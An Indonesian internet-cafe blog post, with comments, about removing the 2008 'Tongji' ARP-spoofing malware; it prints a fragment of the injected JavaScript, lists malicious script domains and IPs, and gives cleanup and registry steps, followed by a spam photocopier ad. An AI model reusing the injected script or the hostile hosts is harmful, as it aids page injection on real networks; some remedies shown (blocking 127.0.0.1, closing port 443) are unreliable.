Sunday, November 16, 2008

Warnet Anda Lumpuh .. Sama akupun juga iya.. Tongji ... Pecundang Bikin Lumpuh Warnet Gw.. (Update Terbaru Artikel Untuk Memusnahkan Tongji)

Entah siapa itu Tongji dan apa maksudnya nyerang wanet Gwa..., Uh sebel banget gwa sama si tongji..., warnet gw berdiri tahun 2005 baru sekaratang bisa lumpuh sama di tongji keparat... , Awalnya gw panik.. share hilang, internet lemot...wuih bikin user pada kabur...!!!!

Akhirnya gw coba googling apaitu tongji dan siapa dia..., eh gwa dapat jawaban dari si embah...wih matur nuwun mbah.... ternyata si tongji menginfeksi setiap browsing ... yang kita buka..., ini contoh javascript si tongji.... mau lihat .. penasaran yach ini dari page source gw ketika gwa browsing yahoo .. kira seperti ini



didalam yahoo ada ini ""

nah gw penasaran ada apa dibalik script ini......, gwa coba cari file js ini http://do.qwertyy.cn/do.js... dan gw lihat dalamnya seperti ini..!!!

document.writeln("");
document.writeln("function oK_Begin(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'<\/riframe>\');");
document.writeln("}");
document.writeln("}");
document.writeln("oK_Begin();");
document.writeln("<\/scriprt>");
document.writeln("window.onerror=function(){return true;}<\/scrirpt>")

pantesan aja warnet gw lumpuh total .. la wong isi scriptnya seperti itu. ya inet gw lelet lah .. :p

dengan berbekal .. info dari sana gw akhirnya googling sama si mbah dan menemukan jawaban sbb :

http://mx.content-type.cn:443/day.js
http://js.tongji.cn.yahoo.com/621252/ystat.js
http://ad.5iyy.info/day.js
http://js.tongji.yahsoo.com.cn

wih serem juga yach .....

Cara yang ampuh untuk menangani itu dengan cara ...
1. format pc
2. install avira / Rising
3. download script addon no script
4. Babat pake Combofix .... bisa didownload disini...
5. Update pake service pack 3 :p

setelah gw amati keempat cara itu bukan cara ampuh buat pemilik warnet karena alasan sbb :

1. Format PC so pasti nambah waktu .. maintenance / ghost pc
2. Antivirus pasti banyak popup & lain sebagainya ...

Ini Jurus ampuh dan jitu saya....

sebelumnya simpan file regedit.exe yang segar bugar ke Flashdisk.

1. Download COmbofix .... disini ..

Sebelumnya Cabut semua Cable /Bebaskan Computer anda Dari Network.

Lakukan Proses Pembersihan Dengan Combofix.

Setelah prosesi combofix Selesai...

2. Repair Generic Host32 yang error dengan jalan.

a. Buka File Regedit dari Fashdisk Anda (Backup Regedit Yangmasih segar bugar:p)
b. Sekarang, Di menu regedit Klik Edit>Find or Ctrl+F and write
"TransportBindName" didalam box tanpa spasi dan quotation mark. Ini Akan
membutuhkan waktu yang sedikit lama dalam pencarian. Value ini akan ketemu dalam
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\N etBT\Parameters
c. Double-click pada value dan set value ke 'N' Biasanya mungkin di set 'Y'.
d. Restart Komputer anda .. (Hela Nafas..Minum Sedikit Air Kopi)


3. ganti file sebagai berikut dari computer yang masih segar:

rundll32.exe
explorer.exe
Host File
regedit.exe

karena ke empat file tersebut adalah korban utama tongji keparat.


4. kemudian ...
Lihat terlebih dahulu di server /yang bagi memiliki warnet status Mac Address Anda ... apakah static apa dynamic ..

dengan cara arp-a

jika dynamic segera lakukan perubahan jalan sbb:

ipaddress Mac Address
arp -s 192.168.0.1 25-jl-52-63-ki-0f
untuk mengetahui mac address anda ketik ipconfig /all.

5. Gunakan Antivirus SMAVAD 3.7 (latest) Centang Registry Area Ke Deep. download disini

6. Update security patch and

Tutup Sementara Akses port 443

berbekal itu semua akhirnya saya menyatakan pernag dengan tongji .... atau .. apa itu

Agar Tongji nggak balik lagi kewarnet kita lakukan langkah sbb:
1. Siapkan Sebatang Rokok dan Minumsecangkir kopi tentunya...!!
2. Install PFsense.... bagi yang udah punya ... ya nggak usah install lagi :p
3. Ikuti langkah saya download langkah jitu saya .. disini gratis koq!!!

13 comments:

Anonymous said...

Huaa .. :(( COmbofixnya ga bisa

Dwi Darmatin said...

oke saya ...lom kasih link silahkan :D

Anonymous said...

apanya silahkan? #-o

Anonymous said...

wueh warnet temen wa kena juga katanye , nyampe deh ke sini hehehe...jadikan pengalaman yg paling berharga

Anonymous said...

combo fix nya download di mana mas? link nya koq gak ad...

Anonymous said...

mas admin,,
ngomong2 warnet mana aja nih yang di pegang sma mas di daerah kerawang..
warnet saya di serang virus system.exe nih..
ngatasinnya gimana ya?

Anonymous said...

gampang yach system.exe itu ya tongji si keparat ..nanti sya kasih tutorialnya

Anonymous said...

untung slama ini warnet yg ta urusin g knp2 yah ...
thanks info nya gan

Anonymous said...

Setelah lama melakukan investigasi, akhirnya saya menemukan biang atau celah tempat virus jaringan bernama tongji dan sebangsanya.

Ternyata virus ini masuk melalui Yahoo Messenger... Atau lebih tepatnya dari iklan yang berada di bagian bawah aplikasi Yahoo Messenger.

Ini terbukti setelah saya memblok aplikasi Yahoo Messenger melalui router (IM/P2P Blocking) selama 3 hari, jaringan bebas dari virus, tetapi ketika saya membuka blok nya kembali, serangan virus masuk lagi.

Cara untuk melihat ada atau tidaknya virus di jaringan adalah dengan melihat Source dari halaman web yang dibuka. Jika dibagian atas ada statement SCRIPT ....... maka kemungkinan besar virus telah aktif di jaringan.

Beberapa alamat tujuan script yang sempat saya data antara lain:

do.qwertyy.cn
u.cruze3.cn
fk.au44.info
s.asde0msd.cn

Semuanya rata-rata dari domain China (.cn). Sama seperti virus tongji, sistem kerjanya adalah dengan menginfeksi salah satu komputer dalam jaringan yang tidak memiliki pertahanan yang kuat.

Jika menggunakan AVG Free 8, harap aktifkan option Scan for tracking cookies, karena virus ini masuk melalui cookies YM. Setelah diaktifkan, maka AVG akan melaporkan tracking cookies ketika kita menjalankan YM.

Setelah virus berhasil menginfeksi salah satu komputer di jaringan, maka dia akan memalsukan MAC Addressnya dan menjadikan dirinya sebagai Gateway, sehingga semua komputer yang membuka situs akan dialihkan ke komputer tersebut sebelum benar-benar ke situs yang dimaksud, tujuannya adalah agar halaman situs disisipi dulu dengan scriptnya.

Hal inilah yang menyebabkan koneksi internet terasa lambat karena semuanya harus melewati komputer bervirus itu. Maka tak terelakkan lagi, SEMUAnya kena, pake Internet Explorer, Mozilla, Opera, atau browser apapun pasti kena, juga walaupun menggunakan Linux juga kena. Tapi tenang saja, komputer lainnya hanya terkena dampak tapi tidak ikut terinfeksi (kecuali komputer tersebut tidak punya pertahanan yang cukup).

Salah satu solusi yang cukup manjur adalah dengan menutup iklan di YM, caranya adalah dengan mengubah registri.

* Tutup aplikasi Yahoo Messenger (Exit bukan Close ya)
* Buka Regedit dan cari: HKEY_CURRENT_USER\Software\Yahoo\Pager\Locale
* Kemudian cari key Enable Messenger Ad
* Ganti nilai 1 menjadi 0

Setelah itu, silahkan gunakan kembali YM dan tidak akan ada lagi iklan di bagian bawah YM dan secara otomatis tidak akan ada lagi jalan untuk virus sebangsa tongji.

Lakukan hal tersebut di semua komputer dalam jaringan (termasuk komputer tamu yang ada YMnya) karena 1 saja komputer dengan YM yang beriklan, dapat menyebabkan terinfeksinya jaringan dan mengganggu aktrifitas Internet.

Jadi, sebagai admin jaringan, lakukan perlindungan pada jaringan anda khususnya Wireless, pasang saja password, sehingga setiap orang yang ingin masuk jaringan harus melapor dan sekalian anda setting YM nya. Atau sekalian blok saja YM :)

Demikianlah pengalaman saya mengatasi virus sebangsa tongji, semoga bermanfaat.

http://www.romystevenj.com/2008/12/akhirnya-ketemu-biang-virus-jaringan/

Anonymous said...

Bos-Bos Yang Ganteng...
kALO Tongji Pusing Juga niiii...

Ada Cara Cepet Juga Niiii....
Bikin Kopi Juga KaLah CePEt...

bLOck Ajha IP SerVer Virus Nya...
Pasti BinGung Dia Mao Lewat Mana...

116.252.185.15
222.216.28.25
117.23.205.231
203.209.244.4
122.224.4.140
127.0.0.1

Enduh_kedetect

Anonymous said...

sama bos kaya tutorial saya btw tks :D

d'marla said...

@enduhkedetect
banyak yang belum tau melihat ip server virusnya,, perjelas dunk
thx

dian shop said...

Type Mesin Harga Promo Stok Barang terbatas
Semaua barang bergaransi resmi 1 thn made in jepan
100% di jamin Original,Cara order HUB 085228567888
PIN BB:2A90DC9D TOKO PLANET
ALAMAT ITC CEMPAKA MAS Jln letjen soeprapto no 28 jakarta pusat.
Toko kami melayani pengiriman seluruh wilaya Indonesia.

Mesin Fotocopy Canon iR2016 Copy-Print Rp.4.500.000
Canon iR2018 Copy-Print Rp.5.900.000
Canon iR4570 Copy-Print-Scan Rp.6.850.000
Canon iR3300 Copy-Print-Scan Rp.6.700.000
Canon iR3035 Copy-Print-Scan Rp.6.000.000
Canon IR3045 Copy-Print-Scan Rp.6.200.000
Canon iR5070 Copy-Print-Scan Rp.8.300.000
Canon iR5570 Copy-Print-Scan Rp.8.500.000
Canon iR6570 Copy-Print-Scan Rp.9.000.000
Canon iR5075 Copy-Print-Scan Rp.10.500.000
Canon iR5000 Copy-Print-Scan Rp.13.500.000
Canon iR6000 Copy-Print-Scan Rp.14.700.000
Canon iR5020 Copy-Print-Scan Rp16.500.00
Canon IR6020 Copy-Print-Scan Rp.17.000.000
CARA TRANSAKSI:
Kami Hanya Melayani Yang Serius.
Kami melayani pembeli di seluruh indonesia.
Pembeli Diwajibkan Melakukan Pembayaran Harga Barang Yang Sesuai Dengan Barang Pesanannya.
Pengiriman barang melalui: JNE, TIKI, dan POS Express
Harga barang kami sudah termasuk ongkos kirim.
Barang yang rusak atau cacat pada saat pengiriman, akan kami gantikan kembali dengan barang yang sama.

KEUNTUNGAN BERBELANJA DI TOKO KAMI:
Barang berkualitas dan harga relatif lebih murah.
Dapat dikirim ke seluruh Indonesia.
Ongkos kirim gratis.
Keamanan dijamin 100% karena setiap pengiriman barang disertai dengan asuransi Dan Nomor resi
Proses cepat dan sederhana.

STOK READY Order sebelum Kehabisan
Jangan ragu transaksi aman no tipu tipu…!
www.canon-indonesia.jimdo.com

Post a Comment

 
Design by Kampress | Modified By Free Kambeeng Template | Kambeeng codes